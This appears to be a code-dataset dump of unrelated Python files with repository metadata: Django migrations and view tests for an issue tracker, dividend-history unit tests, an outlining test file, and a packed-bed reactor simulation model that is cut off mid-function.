field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='user',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
]
| 33.915493
| 79
| 0.601744
| 216
| 2,408
| 6.578704
| 0.194444
| 0.109782
| 0.17734
| 0.228008
| 0.809289
| 0.786066
| 0.786066
| 0.786066
| 0.786066
| 0.786066
| 0
| 0.0029
| 0.284053
| 2,408
| 70
| 80
| 34.4
| 0.821346
| 0.008721
| 0
| 0.6875
| 0
| 0
| 0.124109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046875
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
376735ec3a2d74376c631c89b10cfeb4e2849e37
| 108
|
py
|
Python
|
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
from utils.client_parser import parse as client
from utils.data_parser import parse as data
client()
data()
| 21.6
| 47
| 0.814815
| 18
| 108
| 4.777778
| 0.444444
| 0.209302
| 0.395349
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 4
| 48
| 27
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3776553cfe17fcfd236d7dc2b17cf27d34cf964a
| 7,607
|
py
|
Python
|
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | 1
|
2021-02-07T00:20:59.000Z
|
2021-02-07T00:20:59.000Z
|
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | null | null | null |
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | 2
|
2019-04-25T20:45:12.000Z
|
2021-02-07T01:44:08.000Z
|
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from profiles.models import Profile
from .models import Issue, Comment, Upvote
class TestIssuesViews(TestCase):
def setUp(self):
User.objects.create_user(username="test_user", password="test_password")
def test_get_all_issues_page(self):
response = self.client.get(reverse("all_issues"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "all_issues.html")
def test_get_bugs_page(self):
response = self.client.get(reverse("bugs"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "bugs.html")
def test_get_features_page(self):
response = self.client.get(reverse("features"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "features.html")
def test_get_create_issue_page_when_no_profile(self):
user = User.objects.get(username="test_user")
Profile.objects.filter(user=user).delete()
self.client.login(username='test_user', password='test_password')
response = self.client.get(reverse("create_issue"))
self.assertEqual(response.status_code, 403)
self.assertTemplateUsed(response, "403.html")
def test_get_create_issue_page_if_logged_in(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get(reverse("create_issue"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "create_issue.html")
def test_if_create_issue_page_refreshes_when_form_invalid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
post_data = {
"title": "test",
"author": user,
"description": "description",
"issue": "BG"
}
response = self.client.post(reverse("create_issue"), post_data, follow=True)
self.assertRedirects(response, reverse("create_issue"), status_code=302)
self.assertTemplateUsed(response, "create_issue.html")
def test_if_create_issue_redirects_to_issue_details_when_form_valid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
post_data = {
"title": "test",
"author": user,
"description": "description",
"issue_type": "BG"
}
response = self.client.post(reverse("create_issue"), post_data, follow=True)
issue = Issue.objects.get(title="test")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
self.assertTemplateUsed(response, "issue_details.html")
def test_if_delete_issues_redirects_to_404_if_no_issue(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get("/issues/delete_issue2/")
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, "404.html")
def test_if_delete_issue_deletes_given_issue_and_redirects_to_all_issues(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
response = self.client.get("/issues/delete_issue1/")
self.assertRedirects(response, reverse("all_issues"), status_code=302)
def test_if_issue_details_page_displays_404_page_when_form_invalid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
post_data = {
"author": user,
"related": issue,
"co": "test"
}
response = self.client.post("/issues/issue_details1/", post_data, follow=True)
self.assertEqual(response.status_code, 500)
self.assertTemplateUsed(response, "500.html")
def test_if_issue_details_creates_a_comment_when_form_valid_and_refreshes(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
post_data = {
"author": user,
"related_issue": issue,
"content": "test"
}
response = self.client.post("/issues/issue_details1/", post_data, follow=True)
comment = Comment.objects.get(author=user)
self.assertEqual("test", comment.content)
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
self.assertTemplateUsed(response, "issue_details.html")
def test_if_upvote_issue_redirects_to_403_if_no_profile(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Profile.objects.filter(user=user).delete()
response = self.client.get("/issues/add_upvote1/")
self.assertEqual(response.status_code, 403)
self.assertTemplateUsed(response, "403.html")
def test_if_add_upvote_redirects_to_404_if_no_issue(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get("/issues/delete_issue2/")
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, "404.html")
def test_get_can_add_upvote_and_redirect_to_issue_details(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
def test_get_can_add_upvote_even_if_already_upvoted_feature(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
user.profile.upvotes_owned += 10
user.profile.save()
Issue.objects.create(title="test", author=user, issue_type="FR", description="test")
issue = Issue.objects.get(title="test")
Upvote.objects.create(author=user, related_issue=issue)
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
def test_if_add_upvote_redirects_to_issue_details_if_issue_type_not_fr_or_br(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="none", description="test")
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
| 47.248447
| 94
| 0.671092
| 899
| 7,607
| 5.420467
| 0.107898
| 0.059512
| 0.078802
| 0.068951
| 0.815309
| 0.791504
| 0.763595
| 0.717217
| 0.700595
| 0.649908
| 0
| 0.015074
| 0.206389
| 7,607
| 161
| 95
| 47.248447
| 0.792115
| 0
| 0
| 0.603053
| 0
| 0
| 0.154048
| 0.029837
| 0
| 0
| 0
| 0
| 0.221374
| 1
| 0.129771
| false
| 0.10687
| 0.038168
| 0
| 0.175573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
377a11fded6feec435c82c9919cb406689b21e6a
| 187
|
py
|
Python
|
Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py
|
rsumner33/PTVS
|
f5d67cff8c7bb32992dd4f77c0dfddaca6071250
|
[
"Apache-2.0"
] | null | null | null |
Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py
|
rsumner33/PTVS
|
f5d67cff8c7bb32992dd4f77c0dfddaca6071250
|
[
"Apache-2.0"
] | null | null | null |
Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py
|
rsumner33/PTVS
|
f5d67cff8c7bb32992dd4f77c0dfddaca6071250
|
[
"Apache-2.0"
] | 1
|
2020-12-09T10:16:23.000Z
|
2020-12-09T10:16:23.000Z
|
def f():
pass
#comment
class C:
pass
#comment
if True:
pass
#comment
if True:
pass
else:
pass
#comment
if True:
pass
elif True:
pass
#comment
| 7.48
| 10
| 0.550802
| 25
| 187
| 4.12
| 0.4
| 0.533981
| 0.378641
| 0.495146
| 0.572816
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.374332
| 187
| 25
| 11
| 7.48
| 0.880342
| 0.187166
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| true
| 0.5
| 0
| 0
| 0.142857
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
377f00e755d17d424276dc3d5be23f3d422ce435
| 8,725
|
py
|
Python
|
tests/test_dividend_history.py
|
ilyakatz/dividend_chaser
|
55fee456e04b500068b05d0b6d386464b265778b
|
[
"MIT"
] | 1
|
2019-12-11T23:06:22.000Z
|
2019-12-11T23:06:22.000Z
|
tests/test_dividend_history.py
|
ilyakatz/dividend_chaser
|
55fee456e04b500068b05d0b6d386464b265778b
|
[
"MIT"
] | 28
|
2019-12-12T18:11:29.000Z
|
2020-02-27T18:18:32.000Z
|
tests/test_dividend_history.py
|
ilyakatz/dividend_chaser
|
55fee456e04b500068b05d0b6d386464b265778b
|
[
"MIT"
] | null | null | null |
import unittest
import datetime
from unittest.mock import patch
from freezegun import freeze_time
from dividend_chaser.workers.dividend_history import DividendHistory
from dividend_chaser.orm import orm
class TestNextDividend(unittest.TestCase):
def setUp(self):
print("Cleaning up database")
orm.Dividend.where("1", "=", "1").delete()
orm.Dividendable.where("1", "=", "1").delete()
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend(self):
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, datetime.date(2020, 3, 31))
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend_recent(self):
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 12).strftime("%s"), "formatted_date": "2019-03-12", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, datetime.date(2020, 3, 12))
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend_recent_for_dividendable(self):
"""
Make sure that we only look at dividends for the correct stock
"""
stwd_div_date = datetime.date(2020, 3, 31)
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 1).strftime("%s"), "formatted_date": "2019-03-1", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": stwd_div_date,
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"APPL": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 12).strftime("%s"), "formatted_date": "2019-03-12", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, stwd_div_date)
class TestUpcoming(unittest.TestCase):
def setUp(self):
print("Cleaning up database")
orm.Dividend.where("1", "=", "1").delete()
orm.Dividendable.where("1", "=", "1").delete()
@freeze_time("2020-01-12 12:00:01")
def test_limit_by_volatility(self):
""" Return only results that have actual dividends
"""
dh = DividendHistory([])
true = {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
false = true.copy()
false.update({"average_volume": 100000})
stocks = {
"TRUE": true,
"FALSE": false
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "TRUE")
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming_with_actual(self):
""" Return only results that have actual dividends
"""
dh = DividendHistory([])
stocks = {
"TRUE": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"FALSE": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": False
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "TRUE")
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "STWD")
@freeze_time("2020-01-16 12:00:01")
def test_limit_upcoming_unmet(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 0)
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming_custom_day_limit(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-17 23:47:08.571429",
"formatted_date": "2020-01-17",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"PP": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-15 23:47:08.571429",
"formatted_date": "2020-01-15",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming(limit_days=6)
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "STWD")
| 29.778157
| 115
| 0.528825
| 896
| 8,725
| 4.995536
| 0.121652
| 0.072609
| 0.053172
| 0.078642
| 0.894772
| 0.894772
| 0.882484
| 0.876676
| 0.862824
| 0.8521
| 0
| 0.172128
| 0.32149
| 8,725
| 292
| 116
| 29.880137
| 0.583953
| 0.019026
| 0
| 0.7125
| 0
| 0
| 0.233501
| 0
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.041667
| false
| 0
| 0.025
| 0
| 0.075
| 0.008333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37ab05efec782fa29b729b46c2e14ce59a3e64a4
| 322,167
|
py
|
Python
|
PyREMOT/docs/pbReactor.py
|
sinagilassi/rmt-app
|
bbd5bb496f36116ecec15d75b4133a43a9233aaa
|
[
"MIT"
] | null | null | null |
PyREMOT/docs/pbReactor.py
|
sinagilassi/rmt-app
|
bbd5bb496f36116ecec15d75b4133a43a9233aaa
|
[
"MIT"
] | null | null | null |
PyREMOT/docs/pbReactor.py
|
sinagilassi/rmt-app
|
bbd5bb496f36116ecec15d75b4133a43a9233aaa
|
[
"MIT"
] | null | null | null |
# PACKED-BED REACTOR MODEL
# -------------------------
# import packages/modules
import math as MATH
import numpy as np
from numpy.lib import math
from scipy.integrate import solve_ivp
from timeit import default_timer as timer
from scipy.optimize import fsolve
from scipy import optimize
# internal
from PyREMOT.docs.modelSetting import MODEL_SETTING, PROCESS_SETTING
from PyREMOT.docs.rmtUtility import rmtUtilityClass as rmtUtil
from PyREMOT.docs.rmtThermo import *
from PyREMOT.docs.fluidFilm import *
from PyREMOT.docs.rmtReaction import reactionRateExe, componentFormationRate
from PyREMOT.docs.gasTransPor import calTest
# library
from PyREMOT.library.plot import plotClass as pltc
# data
from PyREMOT.data.inputDataReactor import *
# core
from PyREMOT.core.errors import errGeneralClass as errGeneral
from PyREMOT.core import constants as CONST
from PyREMOT.core.utilities import roundNum, selectFromListByIndex
from PyREMOT.core.config import REACTION_RATE_ACCURACY
# solvers
from PyREMOT.solvers.solSetting import solverSetting
from PyREMOT.core.eqConstants import CONST_EQ_Sh
from PyREMOT.solvers.solOrCo import OrCoClass
from PyREMOT.solvers.solCatParticle import OrCoCatParticleClass
from PyREMOT.solvers.solFiDi import FiDiBuildCMatrix, FiDiBuildTMatrix, FiDiSetMatrix, FiDiBuildCMatrix_DiLe, FiDiBuildTMatrix_DiLe
from PyREMOT.solvers.solFiDi import FiDiMeshGenerator, FiDiDerivative1, FiDiDerivative2, FiDiNonUniformDerivative1, FiDiNonUniformDerivative2
from PyREMOT.solvers.odeSolver import AdBash3, PreCorr3
from PyREMOT.solvers.solResultAnalysis import setOptimizeRootMethod, sortedResult3
class PackedBedReactorClass:
# def main():
"""
Packed-bed Reactor Model
M1 model: packed-bed plug-flow model (1D model)
assumptions:
homogeneous
no dispersion/diffusion along the reactor length
no radial variation of concentration and temperature
mass balance is based on flux
ergun equation is used for pressure drop
neglecting gravitational effects, kinetic energy, and viscosity change
M2 model: dynamic homogenous modeling
M3 model: steady-state homogenous modeling
"""
# internal data
_internalData = []
def __init__(self, modelInput, internalData, reactionListSorted, reactionStochCoeffList):
self.modelInput = modelInput
self.internalData = internalData
self.reactionListSorted = reactionListSorted
self.reactionStochCoeffList = reactionStochCoeffList
# @property
# def internalData(cls):
# return cls._internalData
# @internalData.setter
# def internalData(cls, value):
# cls._internalData.clear()
# cls._internalData.extend(value)
def runM10(self):
"""
M1 modeling case
"""
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# ->
modelParameters = {
"pressure": P,
"temperature": T
}
# component list
compList = self.modelInput['feed']['components']['shell']
labelList = compList.copy()
labelList.append("Flux")
# initial values
# -> mole fraction
MoFri = self.modelInput['feed']['mole-fraction']
# -> flux [kmol/m^2.s]
MoFl = self.modelInput['feed']['molar-flux']
IV = []
IV.extend(MoFri)
IV.append(MoFl)
# print(f"IV: {IV}")
# time span
# t = (0.0, rea_L)
t = np.array([0, rea_L])
times = np.linspace(t[0], t[1], 20)
# tSpan = np.linspace(0, rea_L, 25)
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM1,
t, IV, method="LSODA", t_eval=times, args=(P, T))
# ode result
successStatus = sol.success
dataX = sol.t
dataYs = sol.y
# check
if successStatus is True:
# plot setting
XYList = pltc.plots2DSetXYList(dataX, dataYs)
# -> label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# plot result
pltc.plots2D(dataList, "Reactor Length (m)",
"Concentration (mol/m^3)", "1D Plug-Flow Reactor")
else:
XYList = []
dataList = []
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
# NOTE
# steady-state homogenous modeling
def runM1(self):
"""
M1 modeling case
steady-state modeling of plug-flow reactor
unknowns: Fi,F*,T,P
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Flux")
labelList.append("Temperature")
labelList.append("Pressure")
# component no
compNo = len(compList)
indexFlux = compNo
indexTemp = indexFlux + 1
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed porosity (bed void fraction)
BeVoFr = ReSpec['BeVoFr']
# mole fraction
MoFri = np.array(self.modelInput['feed']['mole-fraction'])
# flowrate [mol/s]
MoFlRa = self.modelInput['feed']['molar-flowrate']
# component flowrate [mol/s]
MoFlRai = MoFlRa*MoFri
# flux [mol/m^2.s]
MoFl = MoFlRa/(CrSeAr)
# component flux [mol/m^2.s]
MoFli = MoFl*MoFri
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = 4/ReInDi # ExHe['EfHeTrAr']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# var no (Fi,FT,T,P)
varNo = compNo + 3
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = MoFlRai
IV[indexFlux] = MoFl
IV[indexTemp] = T
IV[indexPressure] = P
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": {
"OvHeTrCo": U,
"EfHeTrAr": a,
"MeTe": Tm
},
"reactionRateExpr": reactionRateExpr
}
# save data
timesNo = solverSetting['S3']['timesNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# ode solver call
sol = solve_ivp(PackedBedReactorClass.modelEquationM1,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# molar flowrate [mol/s]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert molar flowrate [mol/s] to mole fraction
dataYs1_Ftot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ftot
# flux
dataYs2 = sol.y[indexFlux, :]
labelListYs2 = labelList[indexFlux]
# temperature
dataYs3 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure
dataYs4 = sol.y[indexPressure, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2], [dataYs3], [dataYs4]), axis=0)
# steady-state results [mole fraction, temperature]
_ssdataYs = np.concatenate(
(dataYs1_MoFri, [dataYs3]), axis=0)
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State Modeling [M1] with timesNo: {timesNo} within {elapsed} seconds"
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexFlux], dataList[indexTemp], dataList[indexPressure]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -2], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# plot result
# pltc.plots2D(dataList[0:compNo], "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexFlux], "Reactor Length (m)",
# "Flux (kmol/m^2.s)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexTemp], "Reactor Length (m)",
# "Temperature (K)", "1D Plug-Flow Reactor")
else:
# error
print(f"Final result: {successStatus}")
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _ssdataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM1(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M1 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expression
PARAMS, VARS, RATES
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed porosity (bed void fraction)
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexFlux = compNo
indexT = indexFlux + 1
indexP = indexT + 1
# molar flowrate list [mol/m^3]
MoFlRai = y[0:compNo]
# total molar flux [mol/m^2.s]
MoFl = y[indexFlux]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# total flowrate [mol/m^3]
MoFlRa = np.sum(MoFlRai)
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# concentration species [mol/m^3]
CoSpi = calConcentrationIG(MoFlRai, VoFlRai)
